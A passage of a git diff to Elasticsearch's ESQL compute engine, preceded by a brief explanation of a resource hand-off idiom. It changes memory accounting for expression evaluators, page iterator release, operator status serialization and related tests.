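The comment above describes a general ownership idiom: if handing a resource to a receiver throws, the caller must release it because nobody else holds a reference yet. A minimal, self-contained sketch with a generic resource standing in for Page:

import java.util.function.Consumer;

static <R extends AutoCloseable> void handOff(R resource, Consumer<R> receiver) throws Exception {
    boolean transferred = false;
    try {
        receiver.accept(resource); // on success the receiver owns the resource
        transferred = true;
    } finally {
        if (transferred == false) {
            resource.close(); // the hand-off failed, so we still own it and must release it
        }
    }
}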
+ */ + page.releaseBlocks(); + } + } } @Override @@ -166,7 +202,7 @@ public static class Status implements Operator.Status { public static final NamedWriteableRegistry.Entry ENTRY = new NamedWriteableRegistry.Entry( Operator.Status.class, "page_mapping_to_iterator", - AbstractPageMappingOperator.Status::new + Status::new ); private final long processNanos; @@ -183,7 +219,7 @@ public Status(long processNanos, int pagesProcessed, int pagesEmitted, long rows this.rowsEmitted = rowsEmitted; } - protected Status(StreamInput in) throws IOException { + public Status(StreamInput in) throws IOException { processNanos = in.readVLong(); pagesReceived = in.readVInt(); pagesEmitted = in.readVInt(); @@ -284,11 +320,12 @@ public TransportVersion getMinimalSupportedVersion() { private static class AppendBlocksIterator implements ReleasableIterator { private final Page page; - private final ReleasableIterator next; + private final ReleasableIterator next; + private boolean closed = false; private int positionOffset; - protected AppendBlocksIterator(Page page, ReleasableIterator next) { + protected AppendBlocksIterator(Page page, ReleasableIterator next) { this.page = page; this.next = next; } @@ -305,17 +342,25 @@ public final boolean hasNext() { @Override public final Page next() { - Block read = next.next(); + Block[] read = next.next(); int start = positionOffset; - positionOffset += read.getPositionCount(); - if (start == 0 && read.getPositionCount() == page.getPositionCount()) { + positionOffset += read[0].getPositionCount(); + if (start == 0 && read[0].getPositionCount() == page.getPositionCount()) { for (int b = 0; b < page.getBlockCount(); b++) { page.getBlock(b).incRef(); } - return page.appendBlock(read); + final Page result = page.appendBlocks(read); + // We need to release the blocks of the page in this iteration instead of delaying to the next, + // because the blocks of this page are now shared with the output page. The output page can be + // passed to a separate driver, which may run concurrently with this driver, leading to data races + // of references in AbstractNonThreadSafeRefCounted, which is not thread-safe. + // An alternative would be to make RefCounted for Vectors/Blocks thread-safe when they are about + // to be shared with other drivers via #allowPassingToDifferentDriver. + close(); + return result; } - Block[] newBlocks = new Block[page.getBlockCount() + 1]; - newBlocks[page.getBlockCount()] = read; + Block[] newBlocks = new Block[page.getBlockCount() + read.length]; + System.arraycopy(read, 0, newBlocks, page.getBlockCount(), read.length); try { // TODO a way to filter with a range please. 
int[] positions = IntStream.range(start, positionOffset).toArray(); @@ -332,7 +377,10 @@ public final Page next() { @Override public void close() { - Releasables.closeExpectNoException(page::releaseBlocks, next); + if (closed == false) { + closed = true; + Releasables.closeExpectNoException(page::releaseBlocks, next); + } } } } diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/ColumnLoadOperator.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/ColumnLoadOperator.java index 4e06c1f0f4b69..05f60c1b6834d 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/ColumnLoadOperator.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/ColumnLoadOperator.java @@ -14,7 +14,7 @@ /** * {@link Block#lookup Looks up} values from a provided {@link Block} and - * mergeds them into each {@link Page}. + * merges them into each {@link Page}. */ public class ColumnLoadOperator extends AbstractPageMappingToIteratorOperator { public record Values(String name, Block block) { diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/Driver.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/Driver.java index 775ac401cd916..b91cd3f468ad5 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/Driver.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/Driver.java @@ -267,7 +267,8 @@ private IsBlockedResult runSingleLoopIteration() { if (op.isFinished() == false && nextOp.needsInput()) { driverContext.checkForEarlyTermination(); - assert nextOp.isFinished() == false : "next operator should not be finished yet: " + nextOp; + assert nextOp.isFinished() == false || nextOp instanceof ExchangeSinkOperator || nextOp instanceof LimitOperator + : "next operator should not be finished yet: " + nextOp; Page page = op.getOutput(); if (page == null) { // No result, just move to the next iteration @@ -555,7 +556,7 @@ private void updateStatus(long extraCpuNanos, int extraIterations, DriverStatus. prev.cpuNanos() + extraCpuNanos, prev.iterations() + extraIterations, status, - statusOfCompletedOperators, + List.copyOf(statusOfCompletedOperators), activeOperators.stream().map(op -> new OperatorStatus(op.toString(), op.status())).toList(), sleeps ); diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/DriverCompletionInfo.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/DriverCompletionInfo.java index 7e63fe1681dd3..8f88f9d73b0d4 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/DriverCompletionInfo.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/DriverCompletionInfo.java @@ -95,8 +95,9 @@ public static DriverCompletionInfo readFrom(StreamInput in) throws IOException { in.readVLong(), in.readCollectionAsImmutableList(DriverProfile::readFrom), in.getTransportVersion().onOrAfter(TransportVersions.ESQL_PROFILE_INCLUDE_PLAN) - ? in.readCollectionAsImmutableList(PlanProfile::readFrom) - : List.of() + || in.getTransportVersion().isPatchFrom(TransportVersions.ESQL_PROFILE_INCLUDE_PLAN_8_19) + ?
in.readCollectionAsImmutableList(PlanProfile::readFrom) + : List.of() ); } @@ -105,7 +106,8 @@ public void writeTo(StreamOutput out) throws IOException { out.writeVLong(documentsFound); out.writeVLong(valuesLoaded); out.writeCollection(driverProfiles); - if (out.getTransportVersion().onOrAfter(TransportVersions.ESQL_PROFILE_INCLUDE_PLAN)) { + if (out.getTransportVersion().onOrAfter(TransportVersions.ESQL_PROFILE_INCLUDE_PLAN) + || out.getTransportVersion().isPatchFrom(TransportVersions.ESQL_PROFILE_INCLUDE_PLAN_8_19)) { out.writeCollection(planProfiles); } } diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/EvalOperator.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/EvalOperator.java index 2573baf78b16a..2c9bf74fb8b0a 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/EvalOperator.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/EvalOperator.java @@ -7,8 +7,11 @@ package org.elasticsearch.compute.operator; +import org.apache.lucene.util.Accountable; +import org.apache.lucene.util.RamUsageEstimator; +import org.elasticsearch.common.breaker.CircuitBreaker; +import org.elasticsearch.common.util.BigArrays; import org.elasticsearch.compute.data.Block; -import org.elasticsearch.compute.data.BlockFactory; import org.elasticsearch.compute.data.Page; import org.elasticsearch.core.Releasable; import org.elasticsearch.core.Releasables; @@ -18,12 +21,13 @@ * new block which is appended to the page. */ public class EvalOperator extends AbstractPageMappingOperator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(EvalOperator.class); public record EvalOperatorFactory(ExpressionEvaluator.Factory evaluator) implements OperatorFactory { @Override public Operator get(DriverContext driverContext) { - return new EvalOperator(driverContext.blockFactory(), evaluator.get(driverContext)); + return new EvalOperator(driverContext, evaluator.get(driverContext)); } @Override @@ -32,12 +36,13 @@ public String describe() { } } - private final BlockFactory blockFactory; + private final DriverContext ctx; private final ExpressionEvaluator evaluator; - public EvalOperator(BlockFactory blockFactory, ExpressionEvaluator evaluator) { - this.blockFactory = blockFactory; + public EvalOperator(DriverContext ctx, ExpressionEvaluator evaluator) { + this.ctx = ctx; this.evaluator = evaluator; + ctx.breaker().addEstimateBytesAndMaybeBreak(BASE_RAM_BYTES_USED + evaluator.baseRamBytesUsed(), "ESQL"); } @Override @@ -53,14 +58,77 @@ public String toString() { @Override public void close() { - Releasables.closeExpectNoException(evaluator, super::close); + Releasables.closeExpectNoException( + evaluator, + () -> ctx.breaker().addWithoutBreaking(-BASE_RAM_BYTES_USED - evaluator.baseRamBytesUsed()), + super::close + ); } /** * Evaluates an expression {@code a + b} or {@code log(c)} one {@link Page} at a time. + *

Eval

+ *

+ * The primary interface is the {@link ExpressionEvaluator#eval(Page)} method, which + * performs the actual evaluation. Implementations are generally built as a tree, with + * a member {@link ExpressionEvaluator} for each of their parameters. So + * {@linkplain ExpressionEvaluator#eval(Page)} will typically look like: + *

+ *
{@code
+     *   Block lhs = this.lhs.eval(page);
+     *   Block rhs = this.rhs.eval(page);
+     *   try (Block.Builder result = ...) {
+     *       for (int p = 0; p < lhs.getPositionCount(); p++) {
+     *           result.add(doTheThing(lhs.get(p), rhs.get(p)));
+     *       }
+     *   }
+ * }</pre>
+ * <p>
+ * There are hundreds of them and none of them look just like that, but that's the theory. + * Get {@link Block}s from the children, then evaluate all the rows in a tight loop that + * hopefully can get vectorized. + *
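A hand-written example of that tree pattern, as a hedged sketch: an evaluator for a + b over longs. AddLongsEvaluator is an invented name, imports of LongBlock, RamUsageEstimator, and Releasables are assumed, and the real evaluators are code-generated and additionally handle multivalued inputs, warnings, and vectorized paths:

class AddLongsEvaluator implements EvalOperator.ExpressionEvaluator {
    private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(AddLongsEvaluator.class);

    private final DriverContext ctx;
    private final EvalOperator.ExpressionEvaluator lhs;
    private final EvalOperator.ExpressionEvaluator rhs;

    AddLongsEvaluator(DriverContext ctx, EvalOperator.ExpressionEvaluator lhs, EvalOperator.ExpressionEvaluator rhs) {
        this.ctx = ctx;
        this.lhs = lhs;
        this.rhs = rhs;
    }

    @Override
    public Block eval(Page page) {
        // Evaluate the children first, then combine their values row by row.
        try (LongBlock l = (LongBlock) lhs.eval(page); LongBlock r = (LongBlock) rhs.eval(page)) {
            int positions = page.getPositionCount();
            try (LongBlock.Builder result = ctx.blockFactory().newLongBlockBuilder(positions)) {
                for (int p = 0; p < positions; p++) {
                    if (l.isNull(p) || r.isNull(p)) {
                        result.appendNull();
                    } else {
                        // Assumes single-valued inputs for brevity.
                        result.appendLong(l.getLong(l.getFirstValueIndex(p)) + r.getLong(r.getFirstValueIndex(p)));
                    }
                }
                return result.build();
            }
        }
    }

    @Override
    public long baseRamBytesUsed() {
        // Shallow size of this node plus the "empty" size of the subtree.
        return BASE_RAM_BYTES_USED + lhs.baseRamBytesUsed() + rhs.baseRamBytesUsed();
    }

    @Override
    public void close() {
        Releasables.closeExpectNoException(lhs, rhs);
    }
}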

+ *

+ * Implementations need not be thread safe. A new one is built for each {@link Driver} and + * {@linkplain Driver}s are only ever run in one thread at a time. Many implementations + * allocate "scratch" buffers for temporary memory that they reuse on each call to + * {@linkplain ExpressionEvaluator#eval}. + *
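One common shape for such a scratch buffer, as a hedged sketch (the method is invented; BytesRefBlock#getBytesRef really does fill and return the BytesRef it is handed):

private final BytesRef scratch = new BytesRef();

long totalUtf8Length(BytesRefBlock block) {
    long len = 0;
    for (int p = 0; p < block.getPositionCount(); p++) {
        if (block.isNull(p) == false) {
            // Reuses one BytesRef for every row instead of allocating per value.
            len += block.getBytesRef(block.getFirstValueIndex(p), scratch).length;
        }
    }
    return len;
}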

+ *

+ * Implementations must be ok with being called by different threads, + * though never at the same time. It's possible that the instance belonging to a particular + * {@linkplain Driver} is called on thread {@code A} many times. And then the driver yields. + * After a few seconds the {@linkplain Driver} could be woken on thread {@code B} and will + * then call {@linkplain ExpressionEvaluator#eval(Page)}. No two threads will ever call + * {@linkplain ExpressionEvaluator#eval(Page)} at the same time on the same instance. + * This rarely matters, but some implementations that interact directly with Lucene will need + * to check that {@link Thread#currentThread()} is the same as the previous thread. If + * it isn't, they'll need to reinitialize their Lucene state. + *
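That check might look like the following hypothetical fragment; lastThread, weight, and leafCtx are invented fields, and only Weight#scorer(LeafReaderContext) is a real Lucene call:

private Thread lastThread;
private Scorer scorer; // thread-confined Lucene state

private void reinitIfThreadChanged() throws IOException {
    Thread current = Thread.currentThread();
    if (lastThread != current) {
        lastThread = current;
        scorer = weight.scorer(leafCtx); // rebuild state after the driver migrated threads
    }
}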

+ *

Memory tracking

+ *

+ * Implementations should track their memory usage because it's possible for a single + * ESQL operation to make hundreds of them. Unlike with {@link Accountable} we have a + * {@link ExpressionEvaluator#baseRamBytesUsed} which can be read just after creation + * and is the sum of the ram usage of the tree of {@link ExpressionEvaluator}s while + * "empty". If an implementation must allocate any scratch memory, that is not included. + *

+ *

+ * {@link ExpressionEvaluator#baseRamBytesUsed} memory is tracked in {@link EvalOperator}. + * Implementations that don't allocate any scratch memory need only implement this and + * use {@link DriverContext#blockFactory()} to build results. + *

+ *

+ * Implementations that do allocate memory should use {@link BreakingBytesRefBuilder} + * or {@link BigArrays} or some other safe allocation mechanism. If that isn't possible + * they should communicate with the {@link CircuitBreaker} directly via {@link DriverContext#breaker}. + *
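A minimal sketch of that direct breaker accounting, mirroring what EvalOperator itself does with the evaluator's base usage; the byte count is illustrative:

long scratchBytes = 1024;
ctx.breaker().addEstimateBytesAndMaybeBreak(scratchBytes, "ESQL"); // throws CircuitBreakingException when over budget
try {
    // ... use the scratch memory ...
} finally {
    ctx.breaker().addWithoutBreaking(-scratchBytes); // always give the bytes back
}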

*/ public interface ExpressionEvaluator extends Releasable { - /** A Factory for creating ExpressionEvaluators. */ + /** + * A Factory for creating ExpressionEvaluators. This must + * be thread safe. + */ interface Factory { ExpressionEvaluator get(DriverContext context); @@ -81,6 +149,12 @@ default boolean eagerEvalSafeInLazy() { * @return the returned Block has its own reference and the caller is responsible for releasing it. */ Block eval(Page page); + + /** + * Heap used by the evaluator excluding any memory that's separately tracked + * like the {@link BreakingBytesRefBuilder} used for string concat. + */ + long baseRamBytesUsed(); } public static final ExpressionEvaluator.Factory CONSTANT_NULL_FACTORY = new ExpressionEvaluator.Factory() { @@ -93,14 +167,17 @@ public Block eval(Page page) { } @Override - public void close() { - - } + public void close() {} @Override public String toString() { return CONSTANT_NULL_NAME; } + + @Override + public long baseRamBytesUsed() { + return 0; + } }; } diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/HashAggregationOperator.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/HashAggregationOperator.java index 9c4b9dd360062..cbce712ed9cdb 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/HashAggregationOperator.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/HashAggregationOperator.java @@ -85,7 +85,7 @@ public String describe() { private final BlockHash blockHash; - private final List aggregators; + protected final List aggregators; protected final DriverContext driverContext; diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/OrdinalsGroupingOperator.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/OrdinalsGroupingOperator.java index 9c15b0f3fc7d5..a00377441dab0 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/OrdinalsGroupingOperator.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/OrdinalsGroupingOperator.java @@ -32,7 +32,7 @@ import org.elasticsearch.compute.data.IntBlock; import org.elasticsearch.compute.data.IntVector; import org.elasticsearch.compute.data.Page; -import org.elasticsearch.compute.lucene.ValuesSourceReaderOperator; +import org.elasticsearch.compute.lucene.read.ValuesSourceReaderOperator; import org.elasticsearch.core.RefCounted; import org.elasticsearch.core.Releasable; import org.elasticsearch.core.Releasables; @@ -509,6 +509,7 @@ private static class ValuesAggregator implements Releasable { ) { this.extractor = new ValuesSourceReaderOperator( driverContext.blockFactory(), + Long.MAX_VALUE, List.of(new ValuesSourceReaderOperator.FieldInfo(groupingField, groupingElementType, blockLoaders)), shardContexts, docChannel diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/SampleOperator.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/SampleOperator.java index 56ba95f66f5fa..47d0be6c314e5 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/SampleOperator.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/SampleOperator.java @@ -66,11 +66,11 @@ public String describe() { private final RandomSamplingQuery.RandomSamplingIterator randomSamplingIterator; private boolean finished; - private int 
pagesProcessed = 0; - private int rowsReceived = 0; - private int rowsEmitted = 0; private long collectNanos; private long emitNanos; + private int pagesProcessed = 0; + private long rowsReceived = 0; + private long rowsEmitted = 0; private SampleOperator(double probability, int seed) { finished = false; @@ -109,7 +109,7 @@ private void createOutputPage(Page page) { final int[] sampledPositions = new int[page.getPositionCount()]; int sampledIdx = 0; for (int i = randomSamplingIterator.docID(); i - rowsReceived < page.getPositionCount(); i = randomSamplingIterator.nextDoc()) { - sampledPositions[sampledIdx++] = i - rowsReceived; + sampledPositions[sampledIdx++] = Math.toIntExact(i - rowsReceived); } if (sampledIdx > 0) { outputPages.add(page.filter(Arrays.copyOf(sampledPositions, sampledIdx))); @@ -167,7 +167,7 @@ public Operator.Status status() { return new Status(collectNanos, emitNanos, pagesProcessed, rowsReceived, rowsEmitted); } - private record Status(long collectNanos, long emitNanos, int pagesProcessed, int rowsReceived, int rowsEmitted) + public record Status(long collectNanos, long emitNanos, int pagesProcessed, long rowsReceived, long rowsEmitted) implements Operator.Status { @@ -178,7 +178,13 @@ private record Status(long collectNanos, long emitNanos, int pagesProcessed, int ); Status(StreamInput streamInput) throws IOException { - this(streamInput.readVLong(), streamInput.readVLong(), streamInput.readVInt(), streamInput.readVInt(), streamInput.readVInt()); + this( + streamInput.readVLong(), + streamInput.readVLong(), + streamInput.readVInt(), + streamInput.readVLong(), + streamInput.readVLong() + ); } @Override @@ -186,8 +192,8 @@ public void writeTo(StreamOutput out) throws IOException { out.writeVLong(collectNanos); out.writeVLong(emitNanos); out.writeVInt(pagesProcessed); - out.writeVInt(rowsReceived); - out.writeVInt(rowsEmitted); + out.writeVLong(rowsReceived); + out.writeVLong(rowsEmitted); } @Override @@ -236,7 +242,13 @@ public String toString() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + assert false : "must not be called when overriding supportsVersion"; + throw new UnsupportedOperationException("must not be called when overriding supportsVersion"); + } + + @Override + public boolean supportsVersion(TransportVersion version) { + return version.onOrAfter(TransportVersions.ESQL_SAMPLE_OPERATOR_STATUS_9_1); } } } diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/mvdedupe/MultivalueDedupe.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/mvdedupe/MultivalueDedupe.java index 42e123729b50a..034178797def0 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/mvdedupe/MultivalueDedupe.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/mvdedupe/MultivalueDedupe.java @@ -7,6 +7,7 @@ package org.elasticsearch.compute.operator.mvdedupe; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BlockFactory; import org.elasticsearch.compute.data.BooleanBlock; @@ -164,6 +165,8 @@ public String toString() { } private static class Evaluator implements ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(Evaluator.class); + private final BlockFactory blockFactory; private final ExpressionEvaluator field; private final BiFunction dedupe; @@ -187,7 +190,14 
@@ public String toString() { } @Override - public void close() {} + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED + field.baseRamBytesUsed(); + } + + @Override + public void close() { + field.close(); + } } private MultivalueDedupe() {} diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/topn/ResultBuilderForAggregateMetricDouble.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/topn/ResultBuilderForAggregateMetricDouble.java index a814cf5f98e0a..f4c091e22fac6 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/topn/ResultBuilderForAggregateMetricDouble.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/topn/ResultBuilderForAggregateMetricDouble.java @@ -30,6 +30,11 @@ public void decodeKey(BytesRef keys) { @Override public void decodeValue(BytesRef values) { + int count = TopNEncoder.DEFAULT_UNSORTABLE.decodeVInt(values); + if (count == 0) { + builder.appendNull(); + return; + } for (BlockLoader.DoubleBuilder subBuilder : List.of(builder.min(), builder.max(), builder.sum())) { if (TopNEncoder.DEFAULT_UNSORTABLE.decodeBoolean(values)) { subBuilder.appendDouble(TopNEncoder.DEFAULT_UNSORTABLE.decodeDouble(values)); @@ -51,7 +56,7 @@ public Block build() { @Override public String toString() { - return "ValueExtractorForAggregateMetricDouble"; + return "ResultBuilderForAggregateMetricDouble"; } @Override diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/topn/TopNOperator.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/topn/TopNOperator.java index fdf88cf8f55b4..fde51d4642ae0 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/topn/TopNOperator.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/topn/TopNOperator.java @@ -469,51 +469,50 @@ private Iterator toPages() { p = 0; } - Row row = list.get(i); - BytesRef keys = row.keys.bytesRefView(); - for (SortOrder so : sortOrders) { - if (keys.bytes[keys.offset] == so.nul()) { + try (Row row = list.get(i)) { + BytesRef keys = row.keys.bytesRefView(); + for (SortOrder so : sortOrders) { + if (keys.bytes[keys.offset] == so.nul()) { + keys.offset++; + keys.length--; + continue; + } keys.offset++; keys.length--; - continue; + builders[so.channel].decodeKey(keys); + } + if (keys.length != 0) { + throw new IllegalArgumentException("didn't read all keys"); } - keys.offset++; - keys.length--; - builders[so.channel].decodeKey(keys); - } - if (keys.length != 0) { - throw new IllegalArgumentException("didn't read all keys"); - } - - BytesRef values = row.values.bytesRefView(); - for (ResultBuilder builder : builders) { - builder.setNextRefCounted(row.shardRefCounter); - builder.decodeValue(values); - } - if (values.length != 0) { - throw new IllegalArgumentException("didn't read all values"); - } - list.set(i, null); + BytesRef values = row.values.bytesRefView(); + for (ResultBuilder builder : builders) { + builder.setNextRefCounted(row.shardRefCounter); + builder.decodeValue(values); + } + if (values.length != 0) { + throw new IllegalArgumentException("didn't read all values"); + } - p++; - if (p == size) { - Block[] blocks = new Block[builders.length]; - try { - for (int b = 0; b < blocks.length; b++) { - blocks[b] = builders[b].build(); - } - } finally { - if (blocks[blocks.length - 1] == null) { - Releasables.closeExpectNoException(blocks); + list.set(i, 
null); + + p++; + if (p == size) { + Block[] blocks = new Block[builders.length]; + try { + for (int b = 0; b < blocks.length; b++) { + blocks[b] = builders[b].build(); + } + } finally { + if (blocks[blocks.length - 1] == null) { + Releasables.closeExpectNoException(blocks); + } } + result.add(new Page(blocks)); + Releasables.closeExpectNoException(builders); + builders = null; } - result.add(new Page(blocks)); - Releasables.closeExpectNoException(builders); - builders = null; } - // It's important to close the row only after we build the new block, so we don't pre-release any shard counter. - row.close(); } assert builders == null; success = true; diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/topn/ValueExtractorForAggregateMetricDouble.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/topn/ValueExtractorForAggregateMetricDouble.java index 9bac1b9ba5eee..0e0694b328d9d 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/topn/ValueExtractorForAggregateMetricDouble.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/topn/ValueExtractorForAggregateMetricDouble.java @@ -24,6 +24,7 @@ public class ValueExtractorForAggregateMetricDouble implements ValueExtractor { @Override public void writeValue(BreakingBytesRefBuilder values, int position) { + TopNEncoder.DEFAULT_UNSORTABLE.encodeVInt(1, values); for (DoubleBlock doubleBlock : List.of(block.minBlock(), block.maxBlock(), block.sumBlock())) { if (doubleBlock.isNull(position)) { TopNEncoder.DEFAULT_UNSORTABLE.encodeBoolean(false, values); diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/ConstantBooleanExpressionEvaluator.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/ConstantBooleanExpressionEvaluator.java index 9700a0200f755..6f8ec34c4838d 100644 --- a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/ConstantBooleanExpressionEvaluator.java +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/ConstantBooleanExpressionEvaluator.java @@ -36,6 +36,11 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + return 0; + } + @Override public void close() {} diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/OperatorTests.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/OperatorTests.java index 1a88bac8b3953..b30f0375eeb96 100644 --- a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/OperatorTests.java +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/OperatorTests.java @@ -11,6 +11,7 @@ import org.apache.lucene.document.Field; import org.apache.lucene.document.LongField; import org.apache.lucene.document.LongPoint; +import org.apache.lucene.document.SortedNumericDocValuesField; import org.apache.lucene.document.SortedSetDocValuesField; import org.apache.lucene.index.DirectoryReader; import org.apache.lucene.index.IndexReader; @@ -35,6 +36,7 @@ import org.elasticsearch.common.util.MockPageCacheRecycler; import org.elasticsearch.common.util.concurrent.ConcurrentCollections; import org.elasticsearch.compute.aggregation.CountAggregatorFunction; +import org.elasticsearch.compute.aggregation.ValuesLongAggregatorFunctionSupplier; import org.elasticsearch.compute.aggregation.blockhash.BlockHash; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BlockFactory; @@ -52,7 
+54,7 @@ import org.elasticsearch.compute.lucene.LuceneSourceOperator; import org.elasticsearch.compute.lucene.LuceneSourceOperatorTests; import org.elasticsearch.compute.lucene.ShardContext; -import org.elasticsearch.compute.lucene.ValuesSourceReaderOperator; +import org.elasticsearch.compute.lucene.read.ValuesSourceReaderOperator; import org.elasticsearch.compute.operator.AbstractPageMappingOperator; import org.elasticsearch.compute.operator.Driver; import org.elasticsearch.compute.operator.DriverContext; @@ -254,6 +256,113 @@ public String toString() { assertThat(blockFactory.breaker().getUsed(), equalTo(0L)); } + // TODO: Remove ordinals grouping operator or enable it GroupingAggregatorFunctionTestCase + public void testValuesWithOrdinalGrouping() throws Exception { + DriverContext driverContext = driverContext(); + BlockFactory blockFactory = driverContext.blockFactory(); + + final int numDocs = between(100, 1000); + Map> expectedValues = new HashMap<>(); + try (BaseDirectoryWrapper dir = newDirectory(); RandomIndexWriter writer = new RandomIndexWriter(random(), dir)) { + String VAL_NAME = "val"; + String KEY_NAME = "key"; + for (int i = 0; i < numDocs; i++) { + Document doc = new Document(); + BytesRef key = new BytesRef(Integer.toString(between(1, 100))); + SortedSetDocValuesField keyField = new SortedSetDocValuesField(KEY_NAME, key); + doc.add(keyField); + if (randomBoolean()) { + int numValues = between(0, 2); + for (int v = 0; v < numValues; v++) { + long val = between(1, 1000); + var valuesField = new SortedNumericDocValuesField(VAL_NAME, val); + doc.add(valuesField); + expectedValues.computeIfAbsent(key, k -> new HashSet<>()).add(val); + } + } + writer.addDocument(doc); + } + writer.commit(); + try (DirectoryReader reader = writer.getReader()) { + List operators = new ArrayList<>(); + if (randomBoolean()) { + operators.add(new ShuffleDocsOperator(blockFactory)); + } + operators.add( + new ValuesSourceReaderOperator( + blockFactory, + ByteSizeValue.ofMb(1).getBytes(), + List.of( + new ValuesSourceReaderOperator.FieldInfo( + VAL_NAME, + ElementType.LONG, + unused -> new BlockDocValuesReader.LongsBlockLoader(VAL_NAME) + ) + ), + List.of(new ValuesSourceReaderOperator.ShardContext(reader, () -> { + throw new UnsupportedOperationException(); + }, 0.2)), + 0 + ) + ); + operators.add( + new OrdinalsGroupingOperator( + shardIdx -> new KeywordFieldMapper.KeywordFieldType(KEY_NAME).blockLoader(mockBlContext()), + List.of(new ValuesSourceReaderOperator.ShardContext(reader, () -> SourceLoader.FROM_STORED_SOURCE, 0.2)), + ElementType.BYTES_REF, + 0, + KEY_NAME, + List.of(new ValuesLongAggregatorFunctionSupplier().groupingAggregatorFactory(INITIAL, List.of(1))), + randomPageSize(), + driverContext + ) + ); + operators.add( + new HashAggregationOperator( + List.of(new ValuesLongAggregatorFunctionSupplier().groupingAggregatorFactory(FINAL, List.of(1))), + () -> BlockHash.build( + List.of(new BlockHash.GroupSpec(0, ElementType.BYTES_REF)), + driverContext.blockFactory(), + randomPageSize(), + false + ), + driverContext + ) + ); + Map> actualValues = new HashMap<>(); + Driver driver = TestDriverFactory.create( + driverContext, + luceneOperatorFactory( + reader, + List.of(new LuceneSliceQueue.QueryAndTags(new MatchAllDocsQuery(), List.of())), + LuceneOperator.NO_LIMIT + ).get(driverContext), + operators, + new PageConsumerOperator(page -> { + BytesRefBlock keyBlock = page.getBlock(0); + LongBlock valueBlock = page.getBlock(1); + BytesRef spare = new BytesRef(); + for (int p = 0; p < 
